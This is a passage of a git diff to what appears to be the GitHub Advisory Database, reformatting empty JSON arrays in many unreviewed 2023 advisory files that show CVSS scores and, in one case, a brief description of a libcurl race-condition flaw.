"MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-fc29-rq2p-4h73/GHSA-fc29-rq2p-4h73.json b/advisories/unreviewed/2023/03/GHSA-fc29-rq2p-4h73/GHSA-fc29-rq2p-4h73.json index 134045eb9d2..b1dc47d1d08 100644 --- a/advisories/unreviewed/2023/03/GHSA-fc29-rq2p-4h73/GHSA-fc29-rq2p-4h73.json +++ b/advisories/unreviewed/2023/03/GHSA-fc29-rq2p-4h73/GHSA-fc29-rq2p-4h73.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-fh9w-62q7-2hrw/GHSA-fh9w-62q7-2hrw.json b/advisories/unreviewed/2023/03/GHSA-fh9w-62q7-2hrw/GHSA-fh9w-62q7-2hrw.json index b65d92cd360..62e126c0deb 100644 --- a/advisories/unreviewed/2023/03/GHSA-fh9w-62q7-2hrw/GHSA-fh9w-62q7-2hrw.json +++ b/advisories/unreviewed/2023/03/GHSA-fh9w-62q7-2hrw/GHSA-fh9w-62q7-2hrw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-fm6r-qcm7-79pj/GHSA-fm6r-qcm7-79pj.json b/advisories/unreviewed/2023/03/GHSA-fm6r-qcm7-79pj/GHSA-fm6r-qcm7-79pj.json index 9f5d29dc54c..766d85172d6 100644 --- a/advisories/unreviewed/2023/03/GHSA-fm6r-qcm7-79pj/GHSA-fm6r-qcm7-79pj.json +++ b/advisories/unreviewed/2023/03/GHSA-fm6r-qcm7-79pj/GHSA-fm6r-qcm7-79pj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-fqrq-3g7c-chvf/GHSA-fqrq-3g7c-chvf.json b/advisories/unreviewed/2023/03/GHSA-fqrq-3g7c-chvf/GHSA-fqrq-3g7c-chvf.json index af732f0a12e..91a11adfada 100644 --- a/advisories/unreviewed/2023/03/GHSA-fqrq-3g7c-chvf/GHSA-fqrq-3g7c-chvf.json +++ b/advisories/unreviewed/2023/03/GHSA-fqrq-3g7c-chvf/GHSA-fqrq-3g7c-chvf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-fvmg-vwpf-h264/GHSA-fvmg-vwpf-h264.json b/advisories/unreviewed/2023/03/GHSA-fvmg-vwpf-h264/GHSA-fvmg-vwpf-h264.json index eef0d9f1a7a..ea014e13391 100644 --- a/advisories/unreviewed/2023/03/GHSA-fvmg-vwpf-h264/GHSA-fvmg-vwpf-h264.json +++ b/advisories/unreviewed/2023/03/GHSA-fvmg-vwpf-h264/GHSA-fvmg-vwpf-h264.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-g7xw-c5fw-fpv5/GHSA-g7xw-c5fw-fpv5.json b/advisories/unreviewed/2023/03/GHSA-g7xw-c5fw-fpv5/GHSA-g7xw-c5fw-fpv5.json index 2f0d02ee3a7..347cebc562f 100644 --- a/advisories/unreviewed/2023/03/GHSA-g7xw-c5fw-fpv5/GHSA-g7xw-c5fw-fpv5.json +++ b/advisories/unreviewed/2023/03/GHSA-g7xw-c5fw-fpv5/GHSA-g7xw-c5fw-fpv5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-jgx3-85v5-p87w/GHSA-jgx3-85v5-p87w.json b/advisories/unreviewed/2023/03/GHSA-jgx3-85v5-p87w/GHSA-jgx3-85v5-p87w.json index 5f89e17667c..65b85e78fc8 100644 --- a/advisories/unreviewed/2023/03/GHSA-jgx3-85v5-p87w/GHSA-jgx3-85v5-p87w.json +++ b/advisories/unreviewed/2023/03/GHSA-jgx3-85v5-p87w/GHSA-jgx3-85v5-p87w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-jr2h-m6w7-v4pf/GHSA-jr2h-m6w7-v4pf.json b/advisories/unreviewed/2023/03/GHSA-jr2h-m6w7-v4pf/GHSA-jr2h-m6w7-v4pf.json index 68e2b16e446..7f595ea93a4 100644 --- a/advisories/unreviewed/2023/03/GHSA-jr2h-m6w7-v4pf/GHSA-jr2h-m6w7-v4pf.json +++ b/advisories/unreviewed/2023/03/GHSA-jr2h-m6w7-v4pf/GHSA-jr2h-m6w7-v4pf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-jwjp-r59w-fr92/GHSA-jwjp-r59w-fr92.json b/advisories/unreviewed/2023/03/GHSA-jwjp-r59w-fr92/GHSA-jwjp-r59w-fr92.json index ea67cbbfdbf..bdff3de4673 100644 --- a/advisories/unreviewed/2023/03/GHSA-jwjp-r59w-fr92/GHSA-jwjp-r59w-fr92.json +++ b/advisories/unreviewed/2023/03/GHSA-jwjp-r59w-fr92/GHSA-jwjp-r59w-fr92.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-jxjj-mjxx-6r8p/GHSA-jxjj-mjxx-6r8p.json b/advisories/unreviewed/2023/03/GHSA-jxjj-mjxx-6r8p/GHSA-jxjj-mjxx-6r8p.json index 3fc77ecf80e..3d69c770a0e 100644 --- a/advisories/unreviewed/2023/03/GHSA-jxjj-mjxx-6r8p/GHSA-jxjj-mjxx-6r8p.json +++ b/advisories/unreviewed/2023/03/GHSA-jxjj-mjxx-6r8p/GHSA-jxjj-mjxx-6r8p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-m789-8jxv-f7m3/GHSA-m789-8jxv-f7m3.json b/advisories/unreviewed/2023/03/GHSA-m789-8jxv-f7m3/GHSA-m789-8jxv-f7m3.json index afd0963aca5..f56e04e4fbf 100644 --- a/advisories/unreviewed/2023/03/GHSA-m789-8jxv-f7m3/GHSA-m789-8jxv-f7m3.json +++ b/advisories/unreviewed/2023/03/GHSA-m789-8jxv-f7m3/GHSA-m789-8jxv-f7m3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-mjfv-7q85-fj8m/GHSA-mjfv-7q85-fj8m.json b/advisories/unreviewed/2023/03/GHSA-mjfv-7q85-fj8m/GHSA-mjfv-7q85-fj8m.json index c92344e1996..3fd40bd263d 100644 --- a/advisories/unreviewed/2023/03/GHSA-mjfv-7q85-fj8m/GHSA-mjfv-7q85-fj8m.json +++ b/advisories/unreviewed/2023/03/GHSA-mjfv-7q85-fj8m/GHSA-mjfv-7q85-fj8m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-pqp7-w8g3-wx86/GHSA-pqp7-w8g3-wx86.json b/advisories/unreviewed/2023/03/GHSA-pqp7-w8g3-wx86/GHSA-pqp7-w8g3-wx86.json index 48c61661f72..c525801f431 100644 --- a/advisories/unreviewed/2023/03/GHSA-pqp7-w8g3-wx86/GHSA-pqp7-w8g3-wx86.json +++ b/advisories/unreviewed/2023/03/GHSA-pqp7-w8g3-wx86/GHSA-pqp7-w8g3-wx86.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-qp4j-4q34-9hcp/GHSA-qp4j-4q34-9hcp.json b/advisories/unreviewed/2023/03/GHSA-qp4j-4q34-9hcp/GHSA-qp4j-4q34-9hcp.json index ee85decc9cc..e5c3ba0277d 100644 --- a/advisories/unreviewed/2023/03/GHSA-qp4j-4q34-9hcp/GHSA-qp4j-4q34-9hcp.json +++ b/advisories/unreviewed/2023/03/GHSA-qp4j-4q34-9hcp/GHSA-qp4j-4q34-9hcp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-rpch-gp56-fxr3/GHSA-rpch-gp56-fxr3.json b/advisories/unreviewed/2023/03/GHSA-rpch-gp56-fxr3/GHSA-rpch-gp56-fxr3.json index 226295e9d2f..6bcc072b5d8 100644 --- a/advisories/unreviewed/2023/03/GHSA-rpch-gp56-fxr3/GHSA-rpch-gp56-fxr3.json +++ b/advisories/unreviewed/2023/03/GHSA-rpch-gp56-fxr3/GHSA-rpch-gp56-fxr3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-vc6m-w3jh-f5fx/GHSA-vc6m-w3jh-f5fx.json b/advisories/unreviewed/2023/03/GHSA-vc6m-w3jh-f5fx/GHSA-vc6m-w3jh-f5fx.json index f9eb758472b..83af2ffcba0 100644 --- a/advisories/unreviewed/2023/03/GHSA-vc6m-w3jh-f5fx/GHSA-vc6m-w3jh-f5fx.json +++ b/advisories/unreviewed/2023/03/GHSA-vc6m-w3jh-f5fx/GHSA-vc6m-w3jh-f5fx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-vmmw-985w-hrr3/GHSA-vmmw-985w-hrr3.json b/advisories/unreviewed/2023/03/GHSA-vmmw-985w-hrr3/GHSA-vmmw-985w-hrr3.json index 0ac74b4dfb0..4410ae269cc 100644 --- a/advisories/unreviewed/2023/03/GHSA-vmmw-985w-hrr3/GHSA-vmmw-985w-hrr3.json +++ b/advisories/unreviewed/2023/03/GHSA-vmmw-985w-hrr3/GHSA-vmmw-985w-hrr3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-w5mm-m7x8-jj6r/GHSA-w5mm-m7x8-jj6r.json b/advisories/unreviewed/2023/03/GHSA-w5mm-m7x8-jj6r/GHSA-w5mm-m7x8-jj6r.json index a185d8db0f6..d31f4d409e0 100644 --- a/advisories/unreviewed/2023/03/GHSA-w5mm-m7x8-jj6r/GHSA-w5mm-m7x8-jj6r.json +++ b/advisories/unreviewed/2023/03/GHSA-w5mm-m7x8-jj6r/GHSA-w5mm-m7x8-jj6r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-wc6r-9c75-44gq/GHSA-wc6r-9c75-44gq.json b/advisories/unreviewed/2023/03/GHSA-wc6r-9c75-44gq/GHSA-wc6r-9c75-44gq.json index 0423fd8bf83..0e45d90cb9e 100644 --- a/advisories/unreviewed/2023/03/GHSA-wc6r-9c75-44gq/GHSA-wc6r-9c75-44gq.json +++ b/advisories/unreviewed/2023/03/GHSA-wc6r-9c75-44gq/GHSA-wc6r-9c75-44gq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-whpq-fm42-qw57/GHSA-whpq-fm42-qw57.json b/advisories/unreviewed/2023/03/GHSA-whpq-fm42-qw57/GHSA-whpq-fm42-qw57.json index 58f99efb83f..197e6adb623 100644 --- a/advisories/unreviewed/2023/03/GHSA-whpq-fm42-qw57/GHSA-whpq-fm42-qw57.json +++ b/advisories/unreviewed/2023/03/GHSA-whpq-fm42-qw57/GHSA-whpq-fm42-qw57.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-ww52-r3fc-hc5v/GHSA-ww52-r3fc-hc5v.json b/advisories/unreviewed/2023/03/GHSA-ww52-r3fc-hc5v/GHSA-ww52-r3fc-hc5v.json index 9034cc4fc8f..74ad4b9682d 100644 --- a/advisories/unreviewed/2023/03/GHSA-ww52-r3fc-hc5v/GHSA-ww52-r3fc-hc5v.json +++ b/advisories/unreviewed/2023/03/GHSA-ww52-r3fc-hc5v/GHSA-ww52-r3fc-hc5v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-x2vm-wmh3-5vx3/GHSA-x2vm-wmh3-5vx3.json b/advisories/unreviewed/2023/03/GHSA-x2vm-wmh3-5vx3/GHSA-x2vm-wmh3-5vx3.json index b2da5a12de9..8e4ed309385 100644 --- a/advisories/unreviewed/2023/03/GHSA-x2vm-wmh3-5vx3/GHSA-x2vm-wmh3-5vx3.json +++ b/advisories/unreviewed/2023/03/GHSA-x2vm-wmh3-5vx3/GHSA-x2vm-wmh3-5vx3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-xxjg-73ww-rhcc/GHSA-xxjg-73ww-rhcc.json b/advisories/unreviewed/2023/03/GHSA-xxjg-73ww-rhcc/GHSA-xxjg-73ww-rhcc.json index 2e6932fd969..8b94a5bc903 100644 --- a/advisories/unreviewed/2023/03/GHSA-xxjg-73ww-rhcc/GHSA-xxjg-73ww-rhcc.json +++ b/advisories/unreviewed/2023/03/GHSA-xxjg-73ww-rhcc/GHSA-xxjg-73ww-rhcc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-jj6r-5jxq-c8cw/GHSA-jj6r-5jxq-c8cw.json b/advisories/unreviewed/2023/04/GHSA-jj6r-5jxq-c8cw/GHSA-jj6r-5jxq-c8cw.json index d6316e31136..67473d7b543 100644 --- a/advisories/unreviewed/2023/04/GHSA-jj6r-5jxq-c8cw/GHSA-jj6r-5jxq-c8cw.json +++ b/advisories/unreviewed/2023/04/GHSA-jj6r-5jxq-c8cw/GHSA-jj6r-5jxq-c8cw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-6m39-ww2w-wpfg/GHSA-6m39-ww2w-wpfg.json b/advisories/unreviewed/2023/07/GHSA-6m39-ww2w-wpfg/GHSA-6m39-ww2w-wpfg.json index ef30bf43fcc..76f5b313146 100644 --- a/advisories/unreviewed/2023/07/GHSA-6m39-ww2w-wpfg/GHSA-6m39-ww2w-wpfg.json +++ b/advisories/unreviewed/2023/07/GHSA-6m39-ww2w-wpfg/GHSA-6m39-ww2w-wpfg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-c2w3-xrch-w38j/GHSA-c2w3-xrch-w38j.json b/advisories/unreviewed/2023/07/GHSA-c2w3-xrch-w38j/GHSA-c2w3-xrch-w38j.json index dfee98f7039..7f8181b2453 100644 --- a/advisories/unreviewed/2023/07/GHSA-c2w3-xrch-w38j/GHSA-c2w3-xrch-w38j.json +++ b/advisories/unreviewed/2023/07/GHSA-c2w3-xrch-w38j/GHSA-c2w3-xrch-w38j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-fpmh-3mrp-3732/GHSA-fpmh-3mrp-3732.json b/advisories/unreviewed/2023/07/GHSA-fpmh-3mrp-3732/GHSA-fpmh-3mrp-3732.json index 2c17e8d56e3..afc67c56057 100644 --- a/advisories/unreviewed/2023/07/GHSA-fpmh-3mrp-3732/GHSA-fpmh-3mrp-3732.json +++ b/advisories/unreviewed/2023/07/GHSA-fpmh-3mrp-3732/GHSA-fpmh-3mrp-3732.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-h2fx-27f9-5cr5/GHSA-h2fx-27f9-5cr5.json b/advisories/unreviewed/2023/07/GHSA-h2fx-27f9-5cr5/GHSA-h2fx-27f9-5cr5.json index a88e1c73cee..dec9ca807b5 100644 --- a/advisories/unreviewed/2023/07/GHSA-h2fx-27f9-5cr5/GHSA-h2fx-27f9-5cr5.json +++ b/advisories/unreviewed/2023/07/GHSA-h2fx-27f9-5cr5/GHSA-h2fx-27f9-5cr5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-p3x3-92wj-v2j2/GHSA-p3x3-92wj-v2j2.json b/advisories/unreviewed/2023/07/GHSA-p3x3-92wj-v2j2/GHSA-p3x3-92wj-v2j2.json index f9fd5317a7a..e2285d61c25 100644 --- a/advisories/unreviewed/2023/07/GHSA-p3x3-92wj-v2j2/GHSA-p3x3-92wj-v2j2.json +++ b/advisories/unreviewed/2023/07/GHSA-p3x3-92wj-v2j2/GHSA-p3x3-92wj-v2j2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-x8xh-32hp-4qvw/GHSA-x8xh-32hp-4qvw.json b/advisories/unreviewed/2023/07/GHSA-x8xh-32hp-4qvw/GHSA-x8xh-32hp-4qvw.json index 57cbf23952f..e78c34d183d 100644 --- a/advisories/unreviewed/2023/07/GHSA-x8xh-32hp-4qvw/GHSA-x8xh-32hp-4qvw.json +++ b/advisories/unreviewed/2023/07/GHSA-x8xh-32hp-4qvw/GHSA-x8xh-32hp-4qvw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/07/GHSA-xc3w-ghxg-pw5f/GHSA-xc3w-ghxg-pw5f.json b/advisories/unreviewed/2023/07/GHSA-xc3w-ghxg-pw5f/GHSA-xc3w-ghxg-pw5f.json index f4cf2aabf5c..05c5b643781 100644 --- a/advisories/unreviewed/2023/07/GHSA-xc3w-ghxg-pw5f/GHSA-xc3w-ghxg-pw5f.json +++ b/advisories/unreviewed/2023/07/GHSA-xc3w-ghxg-pw5f/GHSA-xc3w-ghxg-pw5f.json @@ -7,12 +7,8 @@ "CVE-2023-32001" ], "details": "libcurl can be told to save cookie, HSTS and/or alt-svc data to files. When\ndoing this, it called `stat()` followed by `fopen()` in a way that made it\nvulnerable to a TOCTOU race condition problem.\n\nBy exploiting this flaw, an attacker could trick the victim to create or\noverwrite protected files holding this data in ways it was not intended to.\n", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/08/GHSA-qpqv-mwrg-mw8j/GHSA-qpqv-mwrg-mw8j.json b/advisories/unreviewed/2023/08/GHSA-qpqv-mwrg-mw8j/GHSA-qpqv-mwrg-mw8j.json index 8b0a841a9d8..595f144d21a 100644 --- a/advisories/unreviewed/2023/08/GHSA-qpqv-mwrg-mw8j/GHSA-qpqv-mwrg-mw8j.json +++ b/advisories/unreviewed/2023/08/GHSA-qpqv-mwrg-mw8j/GHSA-qpqv-mwrg-mw8j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/09/GHSA-3q2q-8m5p-gc7q/GHSA-3q2q-8m5p-gc7q.json b/advisories/unreviewed/2023/09/GHSA-3q2q-8m5p-gc7q/GHSA-3q2q-8m5p-gc7q.json index 29bbf919881..5193a3049a2 100644 --- a/advisories/unreviewed/2023/09/GHSA-3q2q-8m5p-gc7q/GHSA-3q2q-8m5p-gc7q.json +++ b/advisories/unreviewed/2023/09/GHSA-3q2q-8m5p-gc7q/GHSA-3q2q-8m5p-gc7q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-5x88-x3vg-442p/GHSA-5x88-x3vg-442p.json b/advisories/unreviewed/2023/09/GHSA-5x88-x3vg-442p/GHSA-5x88-x3vg-442p.json index 617b41bc20b..b3c47db5089 100644 --- a/advisories/unreviewed/2023/09/GHSA-5x88-x3vg-442p/GHSA-5x88-x3vg-442p.json +++ b/advisories/unreviewed/2023/09/GHSA-5x88-x3vg-442p/GHSA-5x88-x3vg-442p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-64p4-8fvv-rw89/GHSA-64p4-8fvv-rw89.json b/advisories/unreviewed/2023/09/GHSA-64p4-8fvv-rw89/GHSA-64p4-8fvv-rw89.json index 709b1963bb7..4a30bdb1e03 100644 --- a/advisories/unreviewed/2023/09/GHSA-64p4-8fvv-rw89/GHSA-64p4-8fvv-rw89.json +++ b/advisories/unreviewed/2023/09/GHSA-64p4-8fvv-rw89/GHSA-64p4-8fvv-rw89.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-6f6c-487w-2449/GHSA-6f6c-487w-2449.json b/advisories/unreviewed/2023/09/GHSA-6f6c-487w-2449/GHSA-6f6c-487w-2449.json index 7c71d4ce9b8..51172d6c881 100644 --- a/advisories/unreviewed/2023/09/GHSA-6f6c-487w-2449/GHSA-6f6c-487w-2449.json +++ b/advisories/unreviewed/2023/09/GHSA-6f6c-487w-2449/GHSA-6f6c-487w-2449.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-7jqp-vcg7-7x84/GHSA-7jqp-vcg7-7x84.json b/advisories/unreviewed/2023/09/GHSA-7jqp-vcg7-7x84/GHSA-7jqp-vcg7-7x84.json index dc5ac330510..18865a97e6a 100644 --- a/advisories/unreviewed/2023/09/GHSA-7jqp-vcg7-7x84/GHSA-7jqp-vcg7-7x84.json +++ b/advisories/unreviewed/2023/09/GHSA-7jqp-vcg7-7x84/GHSA-7jqp-vcg7-7x84.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-8f5w-v7hr-cxv5/GHSA-8f5w-v7hr-cxv5.json b/advisories/unreviewed/2023/09/GHSA-8f5w-v7hr-cxv5/GHSA-8f5w-v7hr-cxv5.json index 96c6b07473a..e337993171b 100644 --- a/advisories/unreviewed/2023/09/GHSA-8f5w-v7hr-cxv5/GHSA-8f5w-v7hr-cxv5.json +++ b/advisories/unreviewed/2023/09/GHSA-8f5w-v7hr-cxv5/GHSA-8f5w-v7hr-cxv5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-cpg4-gv23-mpmj/GHSA-cpg4-gv23-mpmj.json b/advisories/unreviewed/2023/09/GHSA-cpg4-gv23-mpmj/GHSA-cpg4-gv23-mpmj.json index ce8ce143c2c..26445addf68 100644 --- a/advisories/unreviewed/2023/09/GHSA-cpg4-gv23-mpmj/GHSA-cpg4-gv23-mpmj.json +++ b/advisories/unreviewed/2023/09/GHSA-cpg4-gv23-mpmj/GHSA-cpg4-gv23-mpmj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/09/GHSA-fr9w-7fqw-r7xj/GHSA-fr9w-7fqw-r7xj.json b/advisories/unreviewed/2023/09/GHSA-fr9w-7fqw-r7xj/GHSA-fr9w-7fqw-r7xj.json index 369f49622b7..6762eb01267 100644 --- a/advisories/unreviewed/2023/09/GHSA-fr9w-7fqw-r7xj/GHSA-fr9w-7fqw-r7xj.json +++ 